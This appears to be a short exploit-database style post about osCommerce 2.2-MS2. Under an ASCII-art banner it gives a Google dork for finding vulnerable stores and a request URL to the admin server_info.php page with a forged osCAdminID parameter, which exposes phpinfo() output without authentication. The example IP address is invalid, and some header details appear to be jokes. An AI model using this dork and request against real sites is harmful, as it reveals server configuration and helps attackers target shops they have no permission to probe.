osCommerce version 2.2-MS2 suffers from a phpinfo() disclosure vulnerability.
555cfd22b3dccbe6ce065052758b14d5fe4bf29a1255dc2e53a80ec5aa04f64b
# Exploit Title: osCommerce 2.2-MS2 phpinfo() disclosure vulnerability
# Date: 21 June 2010
# Author: Neo-Gabriel
# Download: http://www.oscommerce.com/solutions/downloads
# Version: 2.2-MS2
# Tested on: Windows 95
.__ .___.__ _____ _____ .__ .__ .__
__________ | | __| _/|__| ___________ _____/ ____\ / _ \ | | | | _____ | |__
/ ___/ _ \| | / __ | | |/ __ \_ __ \ / _ \ __\ / /_\ \| | | | \__ \ | | \
\___ ( <_> ) |__/ /_/ | | \ ___/| | \/ ( <_> ) | / | \ |_| |__/ __ \| Y \
/____ >____/|____/\____ | |__|\___ >__| \____/|__| /\____|__ /____/____(____ /___| /
\/ \/ \/ \/ \/ \/ \/
dork: intitle:osCommerce 2.2-MS2
expl: 127.0.31.337/admin/server_info.php?osCAdminID=1
--------------------
voila..! :D